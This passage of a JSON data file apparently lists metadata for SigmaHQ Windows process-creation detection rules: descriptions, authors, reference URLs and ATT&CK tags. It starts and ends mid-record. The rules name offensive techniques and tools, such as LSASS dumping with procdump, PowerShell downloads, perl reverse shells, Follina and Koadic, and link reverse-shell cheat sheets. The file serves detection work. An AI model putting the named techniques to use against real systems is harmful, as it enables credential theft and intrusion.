"proc_creation_win_powershell_invoke_webrequest_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "value": "Suspicious Invoke-WebRequest Execution" }, { "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-13", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535663791362519040", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", "value": "Execute Pcwrun.EXE To Leverage Follina" }, { "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p0dalirius/LDAPmonitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "value": "HackTool - SharpLDAPmonitor Execution" }, { "description": "Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\nThe free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\nThe tool has been observed in use by threat groups including Akira ransomware.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate usage of Cloudflare Quick Tunnel" ], "filename": "proc_creation_win_cloudflared_quicktunnel_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "222129f7-f4dc-4568-b0d2-22440a9639ba", "value": "Cloudflared Quick Tunnel Execution" }, { "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", "meta": { "author": "Markus Neis, @Karneades", "creation_date": "2018-03-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.s0111", "attack.g0022", "attack.g0060", "car.2013-08-001", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", "value": "HackTool - Default PowerSploit/Empire Scheduled Task Creation" }, { "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of the system utilities to discover system time for legitimate reason" ], "filename": "proc_creation_win_remote_time_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1124" ] }, "related": [ { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", "value": "Discovery of a System Time" }, { "description": "Detects a Powershell process that contains download commands in its command line string", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_patterns.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", "https://hatching.io/blog/powershell-analysis/", "https://lab52.io/blog/winter-vivern-all-summer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "value": "PowerShell Download Pattern" }, { "description": "Detects when a user downloads a file from an IP based URL using CertOC.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "value": "File Download From IP Based URL Via CertOC.EXE" }, { "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_python_adidnsdump.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "value": "PUA - Adidnsdump Execution" }, { "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", "meta": { "author": "Konstantin Grishchenko, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate usage by software developers" ], "filename": "proc_creation_win_csi_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml" ], "tags": [ "attack.execution", "attack.t1072", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", "value": "Suspicious Csi.exe Usage" }, { "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_stracciatella_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mgeeky/Stracciatella", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "value": "HackTool - Stracciatella Execution" }, { "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", "value": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE" }, { "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", "meta": { "author": "Florian Roth (Nextron Systems), Tigzy", "creation_date": "2021-11-17", "falsepositive": [ "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "filename": "proc_creation_win_winrar_uncommon_folder_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1460978167628406785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", "value": "Winrar Execution in Non-Standard Folder" }, { "description": "Detects command line parameters used by Koadic hack tool", "meta": { "author": "wagga, Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-01-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_koadic.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml" ], "tags": [ "attack.execution", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", "value": "HackTool - Koadic Execution" }, { "description": "Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file", "meta": { "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate use of debugging tools" ], "filename": "proc_creation_win_cdb_arbitrary_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1534957360032120833", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1218", "attack.t1127" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "value": "Potential Binary Proxy Execution Via Cdb.EXE" }, { "description": "Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\nCurrently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.\n", "meta": { "author": "Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dump64_defender_av_bypass_rename.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460597833917251595", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "129966c9-de17-4334-a123-8b58172e664d", "value": "Potential Windows Defender AV Bypass Via Dump64.EXE Rename" }, { "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regsvr32_remote_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "value": "Suspicious Regsvr32 Execution From Remote Share" }, { "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Very unlikely" ], "filename": "proc_creation_win_hktl_inveigh.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Kevin-Robertson/Inveigh", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "value": "HackTool - Inveigh Execution" }, { "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "value": "Suspicious Process Parents" }, { "description": "Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-07-17", "falsepositive": [ "Other legitimate extensions currently not in the list either from third party or specific Windows components." ], "filename": "proc_creation_win_regsvr32_uncommon_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574", "attack.execution" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50919691-7302-437f-8e10-1fe088afa145", "value": "Regsvr32 DLL Execution With Uncommon Extension" }, { "description": "Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks", "meta": { "author": "Bhabesh Raj, X__Junior (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_expand_cabinet_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f107a84-532c-41af-b005-8d12a607639f", "value": "Potentially Suspicious Cabinet File Expansion" }, { "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_perl_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "value": "Perl Inline Command Execution" }, { "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", "meta": { "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of the utilities by legitimate user for legitimate reason" ], "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1482" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", "value": "Domain Trust Discovery Via Dsquery" }, { "description": "Detects potentially suspicious child processes of KeyScrambler.exe", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-05-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_keyscrambler_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/DTCERT/status/1712785421845790799", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1203", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca5583e9-8f80-46ac-ab91-7f314d13b984", "value": "Potentially Suspicious Child Process of KeyScrambler.exe" }, { "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", "meta": { "author": "Thomas Patzke", "creation_date": "2020-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", "https://github.com/byt3bl33d3r/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027.005" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "value": "HackTool - CrackMapExec PowerShell Obfuscation" }, { "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate usage by software developers/testers" ], "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mattifestation/status/1196390321783025666", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1218", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "value": "Time Travel Debugging Utility Usage" }, { "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.\nThis way we are also able to catch cases in which the attacker has renamed the procdump executable.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-10-30", "falsepositive": [ "Unlikely, because no one should dump an lsass process memory", "Another tool that uses command line flags similar to ProcDump" ], "filename": "proc_creation_win_sysinternals_procdump_lsass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.credential-access", "attack.t1003.001", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", "value": "Potential LSASS Process Dump Via Procdump" }, { "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "value": "Potential Remote Desktop Tunneling" }, { "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application\nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", "meta": { "author": "Sreeman", "creation_date": "2020-01-13", "falsepositive": [ 